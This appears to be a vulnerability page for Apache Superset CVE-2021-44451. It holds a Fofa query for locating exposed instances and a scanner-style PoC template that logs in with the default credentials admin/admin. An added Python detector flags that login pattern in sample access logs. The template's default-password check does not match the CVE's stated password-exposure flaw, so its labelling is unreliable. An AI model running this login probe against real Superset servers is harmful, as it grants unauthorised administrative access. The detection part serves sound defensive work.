Apache Superset up to and including 1.3.2 allowed authenticated users to obtain the passwords of registered database connections. This information could be accessed in a non-trivial way.
Users should upgrade to Apache Superset 1.4.0 or higher.
Fofa: app="APACHE-Superset"
PoC code [publicly released]
id: CVE-2021-44451
info:
  name: Apache Superset Default Password
  author: dhiyaneshDK
  severity: high
  verified: true
  description: |
    Apache Superset up to and including 1.3.2 allowed authenticated users to obtain the passwords of registered database connections. This information could be accessed in a non-trivial way.
    Users should upgrade to Apache Superset 1.4.0 or higher.
    Fofa: app="APACHE-Superset"
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
set:
  refererUrl: request.url
rules:
  r0:
    request:
      method: GET
      path: /login/
    expression: response.status == 200
    output:
      search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
      cs_token: search["cs_token"]
      search2: '"Set-Cookie: session=(?P<mycookie>.*?);".bsubmatch(response.raw_header)'
      mycookie: search2["mycookie"]
  r1:
    request:
      method: POST
      path: /login/
      headers:
        Cookie: session={{mycookie}}
      body: csrf_token={{cs_token}}&username=admin&password=admin
    expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>') && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
expression: r0() && r1()
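The template above produces a fixed footprint in the Superset access log: a GET /login/ answered with 200, followed within a second or two by a POST /login/ answered with 302. As an added example (not part of the original PoC), this detector flags that sequence in constructed combined-format log lines; the 5-second window is an assumed threshold, not something the page specifies.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (combined log format); not taken from any real host.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET /login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "POST /login/ HTTP/1.1" 302 219 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2021:10:05:10 +0000] "GET /login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2021:10:06:45 +0000] "POST /login/ HTTP/1.1" 302 219 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Dec/2021:10:07:00 +0000] "POST /login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_scripted_logins(log_text, window_seconds=5):
    """Return {ip: seconds} for clients whose GET /login/ (200) was followed by a
    successful POST /login/ (302) within window_seconds. A human filling in the form
    normally takes longer; an automated credential probe like the template does not.
    window_seconds is an assumed tuning value."""
    last_get = {}   # ip -> timestamp of the most recent GET /login/ that returned 200
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != "/login/":
            continue
        ip = rec["ip"]
        if rec["method"] == "GET" and rec["status"] == 200:
            last_get[ip] = rec["ts"]
        elif rec["method"] == "POST" and rec["status"] == 302 and ip in last_get:
            delta = (rec["ts"] - last_get[ip]).total_seconds()
            if 0 <= delta <= window_seconds:
                hits[ip] = delta
    return hits


if __name__ == "__main__":
    print(find_scripted_logins(SAMPLE_LOG))  # {'203.0.113.7': 1.0}
```

Only 203.0.113.7 is flagged: 198.51.100.4 took 95 seconds between form load and submit, and 192.0.2.9's POST returned 200 (the login form re-rendered, i.e. a failed login) with no preceding GET.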